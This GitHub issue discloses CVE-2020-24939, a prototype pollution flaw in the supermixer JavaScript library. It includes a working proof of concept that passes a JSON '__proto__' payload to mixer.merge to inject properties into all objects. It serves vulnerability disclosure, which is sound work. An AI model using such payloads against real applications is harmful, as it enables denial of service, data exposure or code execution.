CVE-2020-24939: Prototype pollution · Issue #9 · stampit-org/supermixer

I would like to report a Prototype pollution in supermixer, It allows an attacker to modify the prototype of a base object which can vary in severity depending on the implementation.

Vulnerability Description:

Prototype Pollution is a vulnerability affecting JavaScript, Prototype Pollution refers to the ability to inject properties into existing JavaScript language construct prototypes, such as objects.

Proof of Concept:

var mixer = require(‘supermixer’); var payload = '{"__proto__":{"poc":"evil"}}’; var test = {}; console.log("Before: ", test.poc); mixer.merge({},JSON.parse(payload)); console.log("After: ", test.poc);

Impact :

DoS, Access to restricted data, RCE (depends on implementation)